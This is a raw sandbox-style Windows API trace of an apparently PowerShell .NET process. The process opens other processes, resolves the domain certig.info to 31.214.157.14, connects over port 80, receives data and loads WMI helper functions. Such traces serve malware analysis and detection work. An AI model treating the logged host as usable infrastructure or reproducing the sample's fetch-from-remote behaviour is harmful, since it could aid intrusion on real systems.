	[0154.308] RegQueryValueExW (in: hKey=0x3dc, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x1c6ecad0, lpData=0x1c6ecacc, lpcbData=0x1c6ecac8*=0x4 | out: lpType=0x1c6ecad0*=0x4, lpData=0x1c6ecacc*=0x3, lpcbData=0x1c6ecac8*=0x4) returned 0x0
	[0154.308] RegQueryValueExW (in: hKey=0x3dc, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c6ecacc, lpData=0x0, lpcbData=0x1c6ecac8*=0x0 | out: lpType=0x1c6ecacc*=0x4, lpData=0x0, lpcbData=0x1c6ecac8*=0x4) returned 0x0
	[0154.308] RegQueryValueExW (in: hKey=0x3dc, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x1c6ecad0, lpData=0x1c6ecacc, lpcbData=0x1c6ecac8*=0x4 | out: lpType=0x1c6ecad0*=0x4, lpData=0x1c6ecacc*=0x20000, lpcbData=0x1c6ecac8*=0x4) returned 0x0
	[0154.308] RegQueryValueExW (in: hKey=0x3dc, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c6ecacc, lpData=0x0, lpcbData=0x1c6ecac8*=0x0 | out: lpType=0x1c6ecacc*=0x3, lpData=0x0, lpcbData=0x1c6ecac8*=0xaa) returned 0x0
	[0154.308] RegQueryValueExW (in: hKey=0x3dc, lpValueName="Counter Names", lpReserved=0x0, lpType=0x1c6ecacc, lpData=0x309cdc8, lpcbData=0x1c6ecac8*=0xaa | out: lpType=0x1c6ecacc*=0x3, lpData=0x309cdc8*, lpcbData=0x1c6ecac8*=0xaa) returned 0x0
	[0154.313] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0154.316] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x1c6eca80, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0154.317] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x3e8
	[0154.320] MapViewOfFile (hFileMappingObject=0x3e8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1b3d0000
	[0154.320] VirtualQuery (in: lpAddress=0x1b3d0000, lpBuffer=0x1c6eca78, dwLength=0x30 | out: lpBuffer=0x1c6eca78*(BaseAddress=0x1b3d0000, AllocationBase=0x1b3d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0154.321] LocalFree (hMem=0x1b7dcc70) returned 0x0
	[0154.321] RegCloseKey (hKey=0x3dc) returned 0x0
	[0154.324] GetVersionExW (in: lpVersionInformation=0x1c6eba50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c6eba50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0154.325] GetVersionExW (in: lpVersionInformation=0x1c6eba20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1c6eba20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0154.326] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x309da98, cbSid=0x1c6eca60 | out: pSid=0x309da98*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6eca60) returned 1
	[0154.329] CreateMutexW (lpMutexAttributes=0x309dca0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3dc
	[0154.332] WaitForSingleObject (hHandle=0x3dc, dwMilliseconds=0x1f4) returned 0x0
	[0154.333] GetCurrentProcessId () returned 0x708
	[0154.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x708) returned 0x3ec
	[0154.335] GetProcessTimes (in: hProcess=0x3ec, lpCreationTime=0x1c6ec970, lpExitTime=0x1c6ec968, lpKernelTime=0x1c6ec960, lpUserTime=0x1c6ec958 | out: lpCreationTime=0x1c6ec970, lpExitTime=0x1c6ec968, lpKernelTime=0x1c6ec960, lpUserTime=0x1c6ec958) returned 1
	[0154.335] CloseHandle (hObject=0x3ec) returned 1
	[0154.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x120) returned 0x3ec
	[0154.335] GetProcessTimes (in: hProcess=0x3ec, lpCreationTime=0x1c6eca00, lpExitTime=0x1c6ec9f8, lpKernelTime=0x1c6ec9f0, lpUserTime=0x1c6ec9e8 | out: lpCreationTime=0x1c6eca00, lpExitTime=0x1c6ec9f8, lpKernelTime=0x1c6ec9f0, lpUserTime=0x1c6ec9e8) returned 1
	[0154.336] CloseHandle (hObject=0x3ec) returned 1
	[0154.336] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x120) returned 0x3ec
	[0154.337] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.337] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.338] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c6ec958, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c6ec958*=0x3f0) returned 1
	[0154.339] CloseHandle (hObject=0x3f0) returned 1
	[0154.339] CloseHandle (hObject=0x3ec) returned 1
	[0154.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xaa0) returned 0x3ec
	[0154.339] GetProcessTimes (in: hProcess=0x3ec, lpCreationTime=0x1c6eca00, lpExitTime=0x1c6ec9f8, lpKernelTime=0x1c6ec9f0, lpUserTime=0x1c6ec9e8 | out: lpCreationTime=0x1c6eca00, lpExitTime=0x1c6ec9f8, lpKernelTime=0x1c6ec9f0, lpUserTime=0x1c6ec9e8) returned 1
	[0154.339] CloseHandle (hObject=0x3ec) returned 1
	[0154.339] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xaa0) returned 0x3ec
	[0154.340] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.340] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.340] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c6ec958, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c6ec958*=0x3f0) returned 1
	[0154.340] CloseHandle (hObject=0x3f0) returned 1
	[0154.340] CloseHandle (hObject=0x3ec) returned 1
	[0154.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x808) returned 0x3ec
	[0154.340] GetProcessTimes (in: hProcess=0x3ec, lpCreationTime=0x1c6eca00, lpExitTime=0x1c6ec9f8, lpKernelTime=0x1c6ec9f0, lpUserTime=0x1c6ec9e8 | out: lpCreationTime=0x1c6eca00, lpExitTime=0x1c6ec9f8, lpKernelTime=0x1c6ec9f0, lpUserTime=0x1c6ec9e8) returned 1
	[0154.341] CloseHandle (hObject=0x3ec) returned 1
	[0154.341] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x808) returned 0x3ec
	[0154.341] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.341] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.341] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c6ec958, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c6ec958*=0x3f0) returned 1
	[0154.341] CloseHandle (hObject=0x3f0) returned 1
	[0154.341] CloseHandle (hObject=0x3ec) returned 1
	[0154.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c4) returned 0x3ec
	[0154.341] GetProcessTimes (in: hProcess=0x3ec, lpCreationTime=0x1c6eca00, lpExitTime=0x1c6ec9f8, lpKernelTime=0x1c6ec9f0, lpUserTime=0x1c6ec9e8 | out: lpCreationTime=0x1c6eca00, lpExitTime=0x1c6ec9f8, lpKernelTime=0x1c6ec9f0, lpUserTime=0x1c6ec9e8) returned 1
	[0154.342] CloseHandle (hObject=0x3ec) returned 1
	[0154.342] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x8c4) returned 0x3ec
	[0154.342] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.342] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.342] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c6ec958, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c6ec958*=0x3f0) returned 1
	[0154.342] CloseHandle (hObject=0x3f0) returned 1
	[0154.342] CloseHandle (hObject=0x3ec) returned 1
	[0154.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x3ec
	[0154.342] GetProcessTimes (in: hProcess=0x3ec, lpCreationTime=0x1c6eca00, lpExitTime=0x1c6ec9f8, lpKernelTime=0x1c6ec9f0, lpUserTime=0x1c6ec9e8 | out: lpCreationTime=0x1c6eca00, lpExitTime=0x1c6ec9f8, lpKernelTime=0x1c6ec9f0, lpUserTime=0x1c6ec9e8) returned 1
	[0154.343] CloseHandle (hObject=0x3ec) returned 1
	[0154.343] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x7cc) returned 0x3ec
	[0154.343] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.343] GetCurrentProcess () returned 0xffffffffffffffff
	[0154.343] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x3ec, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c6ec958, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c6ec958*=0x3f0) returned 1
	[0154.344] ReleaseMutex (hMutex=0x3dc) returned 1
	[0154.344] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x309ed80, cbSid=0x1c6eca60 | out: pSid=0x309ed80*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6eca60) returned 1
	[0154.344] CreateMutexW (lpMutexAttributes=0x309ef38, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3dc
	[0154.345] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x309fba8, cbSid=0x1c6eca60 | out: pSid=0x309fba8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6eca60) returned 1
	[0154.345] CreateMutexW (lpMutexAttributes=0x309fd60, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3dc
	[0154.345] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30a09e0, cbSid=0x1c6eca60 | out: pSid=0x30a09e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6eca60) returned 1
	[0154.346] CreateMutexW (lpMutexAttributes=0x30a0b98, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3dc
	[0154.346] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30a1810, cbSid=0x1c6eca60 | out: pSid=0x30a1810*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6eca60) returned 1
	[0154.346] CreateMutexW (lpMutexAttributes=0x30a19c8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3dc
	[0154.376] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30a2640, cbSid=0x1c6eca10 | out: pSid=0x30a2640*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6eca10) returned 1
	[0154.376] CreateMutexW (lpMutexAttributes=0x30a27f8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3dc
	[0154.376] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30a3460, cbSid=0x1c6eca10 | out: pSid=0x30a3460*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6eca10) returned 1
	[0154.377] CreateMutexW (lpMutexAttributes=0x30a3618, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3dc
	[0154.377] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30a4278, cbSid=0x1c6eca10 | out: pSid=0x30a4278*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6eca10) returned 1
	[0154.377] CreateMutexW (lpMutexAttributes=0x30a4430, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3dc
	[0154.378] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30a50a0, cbSid=0x1c6eca10 | out: pSid=0x30a50a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6eca10) returned 1
	[0154.378] CreateMutexW (lpMutexAttributes=0x30a5258, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3dc
	[0154.378] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x30a5ec0, cbSid=0x1c6eca10 | out: pSid=0x30a5ec0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1c6eca10) returned 1
	[0154.378] CreateMutexW (lpMutexAttributes=0x30a6078, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3dc
	[0154.379] CoTaskMemAlloc (cb=0xd) returned 0x1b81c510
	[0154.381] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x1c6ecf00*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c6ecef8 | out: ppResult=0x1c6ecef8*=0x1b811320*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x1b81c850*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0154.418] CoTaskMemFree (pv=0x1b81c510) 
	[0154.418] CoTaskMemFree (pv=0x0) 
	[0154.419] FreeAddrInfoW (pAddrInfo=0x1b811320*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o.info", ai_addr=0x1b81c850*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0154.419] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x414
	[0154.420] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x41c
	[0154.421] WSAConnect (in: s=0x414, name=0x30a6c40*(sa_family=2, sin_port=0x50, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0154.455] closesocket (s=0x41c) returned 0
	[0155.039] CoTaskMemAlloc (cb=0x104) returned 0x1b7db570
	[0155.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7db570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0155.039] CoTaskMemFree (pv=0x1b7db570) 
	[0157.058] recv (in: s=0x414, buf=0x30d0ae8, len=502, flags=0 | out: buf=0x30d0ae8*) returned 326
	[0158.337] CoTaskMemAlloc (cb=0x104) returned 0x1b7db570
	[0158.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7db570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.337] CoTaskMemFree (pv=0x1b7db570) 
	[0158.495] VirtualQuery (in: lpAddress=0x1c6eca60, lpBuffer=0x1c6ed920, dwLength=0x30 | out: lpBuffer=0x1c6ed920*(BaseAddress=0x1c6ec000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0158.639] CoTaskMemAlloc (cb=0x104) returned 0x1b7db570
	[0158.639] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7db570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.639] CoTaskMemFree (pv=0x1b7db570) 
	[0158.728] CoTaskMemAlloc (cb=0x104) returned 0x1b7db570
	[0158.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7db570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.728] CoTaskMemFree (pv=0x1b7db570) 
	[0158.912] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1e0
	[0158.919] CoGetObjectContext (in: riid=0x1c6ecd78*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd70 | out: ppv=0x1c6ecd70*=0x321868) returned 0x0
	[0158.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c6eb880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0158.969] CoTaskMemAlloc (cb=0x43) returned 0x1b826d50
	[0158.969] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\\\wminet_utils.dll") returned 0x642ffff0000
	[0159.529] CoTaskMemFree (pv=0x1b826d50) 
	[0159.530] CoTaskMemAlloc (cb=0xf) returned 0x1b828660
	[0159.531] GetProcAddress (hModule=0x642ffff0000, lpProcName="ResetSecurity") returned 0x642ffff20e0
	[0159.531] CoTaskMemFree (pv=0x1b828660) 
	[0159.714] CoTaskMemAlloc (cb=0xd) returned 0x1b828660
	[0159.714] GetProcAddress (hModule=0x642ffff0000, lpProcName="SetSecurity") returned 0x642ffff21b0
	[0159.714] CoTaskMemFree (pv=0x1b828660) 
	[0160.126] CoTaskMemAlloc (cb=0x14) returned 0x1b828660
	[0160.126] GetProcAddress (hModule=0x642ffff0000, lpProcName="BlessIWbemServices") returned 0x642ffff2290
	[0160.126] CoTaskMemFree (pv=0x1b828660) 
	[0160.799] CoTaskMemAlloc (cb=0x1a) returned 0x1b824a10
	[0160.800] GetProcAddress (hModule=0x642ffff0000, lpProcName="BlessIWbemServicesObject") returned 0x642ffff23b0
	[0160.800] CoTaskMemFree (pv=0x1b824a10) 
	[0161.291] CoTaskMemAlloc (cb=0x13) returned 0x1b828660
	[0161.292] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetPropertyHandle") returned 0x642ffff24d0
	[0161.292] CoTaskMemFree (pv=0x1b828660) 
	[0161.325] CoTaskMemAlloc (cb=0x14) returned 0x1b828660
	[0161.326] GetProcAddress (hModule=0x642ffff0000, lpProcName="WritePropertyValue") returned 0x642ffff2500
	[0161.326] CoTaskMemFree (pv=0x1b828660) 
	[0161.573] CoTaskMemAlloc (cb=0x7) returned 0x1b820d30
	[0161.574] GetProcAddress (hModule=0x642ffff0000, lpProcName="Clone") returned 0x642ffff2530
	[0161.574] CoTaskMemFree (pv=0x1b820d30) 
	[0161.942] CoTaskMemAlloc (cb=0x11) returned 0x1b8286a0
	[0161.943] GetProcAddress (hModule=0x642ffff0000, lpProcName="VerifyClientKey") returned 0x642ffff31f0
	[0161.943] CoTaskMemFree (pv=0x1b8286a0) 
	[0161.957] CoTaskMemAlloc (cb=0x11) returned 0x1b8286a0
	[0161.958] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetQualifierSet") returned 0x642ffff2a50
	[0161.958] CoTaskMemFree (pv=0x1b8286a0) 
	[0162.190] CoTaskMemAlloc (cb=0x5) returned 0x1b820d30
	[0162.191] GetProcAddress (hModule=0x642ffff0000, lpProcName="Get") returned 0x642ffff2700
	[0162.191] CoTaskMemFree (pv=0x1b820d30) 
	[0162.545] CoTaskMemAlloc (cb=0x5) returned 0x1b820d30
	[0162.545] GetProcAddress (hModule=0x642ffff0000, lpProcName="Put") returned 0x642ffff26c0
	[0162.545] CoTaskMemFree (pv=0x1b820d30) 
	[0162.681] CoTaskMemAlloc (cb=0x8) returned 0x1b820d30
	[0162.681] GetProcAddress (hModule=0x642ffff0000, lpProcName="Delete") returned 0x642ffff2750
	[0162.681] CoTaskMemFree (pv=0x1b820d30) 
	[0162.707] CoTaskMemAlloc (cb=0xa) returned 0x1b8286a0
	[0162.707] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetNames") returned 0x642ffff2760
	[0162.707] CoTaskMemFree (pv=0x1b8286a0) 
	[0163.058] CoTaskMemAlloc (cb=0x12) returned 0x1b8286a0
	[0163.058] GetProcAddress (hModule=0x642ffff0000, lpProcName="BeginEnumeration") returned 0x642ffff27b0
	[0163.058] CoTaskMemFree (pv=0x1b8286a0) 
	[0163.081] CoTaskMemAlloc (cb=0x6) returned 0x1b820d30
	[0163.082] GetProcAddress (hModule=0x642ffff0000, lpProcName="Next") returned 0x642ffff27c0
	[0163.082] CoTaskMemFree (pv=0x1b820d30) 
	[0163.357] CoTaskMemAlloc (cb=0x10) returned 0x1b8286a0
	[0163.357] GetProcAddress (hModule=0x642ffff0000, lpProcName="EndEnumeration") returned 0x642ffff2810
	[0163.358] CoTaskMemFree (pv=0x1b8286a0) 
	[0163.479] CoTaskMemAlloc (cb=0x19) returned 0x1b824710
	[0163.480] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetPropertyQualifierSet") returned 0x642ffff2820
	[0163.480] CoTaskMemFree (pv=0x1b824710) 
	[0163.515] CoTaskMemAlloc (cb=0x7) returned 0x1b820d30
	[0163.515] GetProcAddress (hModule=0x642ffff0000, lpProcName="Clone") returned 0x642ffff2530
	[0163.515] CoTaskMemFree (pv=0x1b820d30) 
	[0163.515] CoTaskMemAlloc (cb=0xf) returned 0x1b828660
	[0163.516] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetObjectText") returned 0x642ffff2840
	[0163.516] CoTaskMemFree (pv=0x1b828660) 
	[0163.655] CoTaskMemAlloc (cb=0x13) returned 0x1b8286a0
	[0163.655] GetProcAddress (hModule=0x642ffff0000, lpProcName="SpawnDerivedClass") returned 0x642ffff2860
	[0163.655] CoTaskMemFree (pv=0x1b8286a0) 
	[0163.787] CoTaskMemAlloc (cb=0xf) returned 0x1b828660
	[0163.787] GetProcAddress (hModule=0x642ffff0000, lpProcName="SpawnInstance") returned 0x642ffff2880
	[0163.787] CoTaskMemFree (pv=0x1b828660) 
	[0163.985] CoTaskMemAlloc (cb=0xb) returned 0x1b8286a0
	[0163.985] GetProcAddress (hModule=0x642ffff0000, lpProcName="CompareTo") returned 0x642ffff28a0
	[0163.985] CoTaskMemFree (pv=0x1b8286a0) 
	[0164.009] CoTaskMemAlloc (cb=0x13) returned 0x1b8286a0
	[0164.009] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetPropertyOrigin") returned 0x642ffff28c0
	[0164.009] CoTaskMemFree (pv=0x1b8286a0) 
	[0164.459] CoTaskMemAlloc (cb=0xe) returned 0x1b8286a0
	[0164.460] GetProcAddress (hModule=0x642ffff0000, lpProcName="InheritsFrom") returned 0x642ffff28e0
	[0164.460] CoTaskMemFree (pv=0x1b8286a0) 
	[0164.636] CoTaskMemAlloc (cb=0xb) returned 0x1b8286a0
	[0164.636] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetMethod") returned 0x642ffff28f0
	[0164.637] CoTaskMemFree (pv=0x1b8286a0) 
	[0164.811] CoTaskMemAlloc (cb=0xb) returned 0x1b8286a0
	[0164.812] GetProcAddress (hModule=0x642ffff0000, lpProcName="PutMethod") returned 0x642ffff2940
	[0164.812] CoTaskMemFree (pv=0x1b8286a0) 
	[0164.842] CoTaskMemAlloc (cb=0xe) returned 0x1b8286a0
	[0164.843] GetProcAddress (hModule=0x642ffff0000, lpProcName="DeleteMethod") returned 0x642ffff2990
	[0164.843] CoTaskMemFree (pv=0x1b8286a0) 
	[0165.056] CoTaskMemAlloc (cb=0x18) returned 0x1b8286a0
	[0165.057] GetProcAddress (hModule=0x642ffff0000, lpProcName="BeginMethodEnumeration") returned 0x642ffff29a0
	[0165.057] CoTaskMemFree (pv=0x1b8286a0) 
	[0165.078] CoTaskMemAlloc (cb=0xc) returned 0x1b8286a0
	[0165.078] GetProcAddress (hModule=0x642ffff0000, lpProcName="NextMethod") returned 0x642ffff29b0
	[0165.078] CoTaskMemFree (pv=0x1b8286a0) 
	[0165.515] CoTaskMemAlloc (cb=0x16) returned 0x1b8286a0
	[0165.515] GetProcAddress (hModule=0x642ffff0000, lpProcName="EndMethodEnumeration") returned 0x642ffff2a00
	[0165.515] CoTaskMemFree (pv=0x1b8286a0) 
	[0165.518] CoTaskMemAlloc (cb=0x17) returned 0x1b8286a0
	[0165.518] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetMethodQualifierSet") returned 0x642ffff2a10
	[0165.518] CoTaskMemFree (pv=0x1b8286a0) 
	[0165.643] CoTaskMemAlloc (cb=0x11) returned 0x1b828660
	[0165.643] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetMethodOrigin") returned 0x642ffff2a30
	[0165.643] CoTaskMemFree (pv=0x1b828660) 
	[0165.988] CoTaskMemAlloc (cb=0x12) returned 0x1b828660
	[0165.988] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Get") returned 0x642ffff2a60
	[0165.988] CoTaskMemFree (pv=0x1b828660) 
	[0166.286] CoTaskMemAlloc (cb=0x12) returned 0x1b828660
	[0166.287] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Put") returned 0x642ffff2ab0
	[0166.287] CoTaskMemFree (pv=0x1b828660) 
	[0166.478] CoTaskMemAlloc (cb=0x15) returned 0x1b828660
	[0166.479] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Delete") returned 0x642ffff2ae0
	[0166.479] CoTaskMemFree (pv=0x1b828660) 
	[0166.507] CoTaskMemAlloc (cb=0x17) returned 0x1b828660
	[0166.507] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_GetNames") returned 0x642ffff2af0
	[0166.507] CoTaskMemFree (pv=0x1b828660) 
	[0166.656] CoTaskMemAlloc (cb=0x1f) returned 0x1b8246b0
	[0166.656] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_BeginEnumeration") returned 0x642ffff2b10
	[0166.656] CoTaskMemFree (pv=0x1b8246b0) 
	[0166.834] CoTaskMemAlloc (cb=0x13) returned 0x1b828660
	[0166.834] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_Next") returned 0x642ffff2b20
	[0166.834] CoTaskMemFree (pv=0x1b828660) 
	[0167.166] CoTaskMemAlloc (cb=0x1d) returned 0x1b824860
	[0167.167] GetProcAddress (hModule=0x642ffff0000, lpProcName="QualifierSet_EndEnumeration") returned 0x642ffff2b70
	[0167.167] CoTaskMemFree (pv=0x1b824860) 
	[0167.169] CoTaskMemAlloc (cb=0x19) returned 0x1b824890
	[0167.169] GetProcAddress (hModule=0x642ffff0000, lpProcName="GetCurrentApartmentType") returned 0x642ffff2a50
	[0167.169] CoTaskMemFree (pv=0x1b824890) 
	[0167.291] CoTaskMemAlloc (cb=0x16) returned 0x1b828660
